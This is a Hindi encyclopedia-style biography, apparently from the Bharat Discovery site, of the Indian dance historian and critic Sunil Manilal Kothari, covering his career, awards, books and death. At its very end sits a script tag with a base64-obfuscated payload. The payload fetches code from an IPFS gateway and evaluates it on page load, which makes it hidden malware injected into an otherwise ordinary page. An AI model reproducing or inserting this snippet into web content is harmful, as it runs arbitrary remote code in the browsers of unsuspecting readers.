सुनील मणिलाल कोठारी
भारत डिस्कवरी प्रस्तुति
सुनील मणिलाल कोठारी (अंग्रेज़ी: Sunil Maniklal Kothari, जन्म- 20 दिसम्बर, 1933; मृत्यु- 27 दिसम्बर, 2020) भारत के एक प्रख्यात नृत्य इतिहासकार, विद्वान और आलोचक थे। उन्होंने एक स्वतन्त्र लेखक के रूप में कार्य किया।
परिचय
- सन 1964 में सुनील मणिलाल कोठारी ने एम.ए. और 1977 में पीएचडी पूरी की थी। व्यावसायिक रूप से वे एक चार्टर्ड एकाउंटेंट थे। उन्होंने अपने कॅरियर की शुरुआत 'द टाइम्स ऑफ इंडिया' से की थी। सुनील मणिलाल कोठारी ने सिडेनहम कॉलेज ऑफ कॉमर्स एंड इकोनॉमिक्स में भी पढ़ाया। एक स्वतन्त्र लेखक के रूप में उन्होंने कार्य किया।
सम्मान व पुरस्कार
- साल 2001 में सुनील मणिलाल कोठारी को पद्म श्री प्रदान किया गया।
- भारतीय शास्त्रीय नृत्य में समग्र योगदान के लिए उन्हें 1995 में संगीत नाटक अकादमी पुरस्कार भी मिला।
- उन्हें 1961 में कुमार चंद्रक और 2012 में रंजीतराम सुवर्ण चंद्रक से सम्मानित किया गया।
ग्रन्थ सूची
सुनील मणिलाल कोठारी ने भारतीय शास्त्रीय नृत्य और संबद्ध कला-रूपों के विभिन्न रूपों पर 12 पुस्तकें लिखी हैं-
- कुचिपुड़ी: भारतीय शास्त्रीय नृत्य कला
- ओडिसी: भारतीय शास्त्रीय नृत्य कला
- रस: पिछले 25 वर्षों में भारतीय प्रदर्शन कला
- भारतीय नृत्य में नई दिशाएँ
- रुक्मिणी देवी की फोटो जीवनी
- कथक: भारतीय शास्त्रीय नृत्य कला
- भरत नाट्यम: भारतीय शास्त्रीय नृत्य कला
- भारत के छऊ नृत्य
मृत्यु
27 दिसंबर, 2020 को हृदय गति रुक जाने के कारण सुनील मणिलाल कोठारी का निधन हो गया।
|
|
|
|
|
टीका टिप्पणी और संदर्भ
संबंधित लेख
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>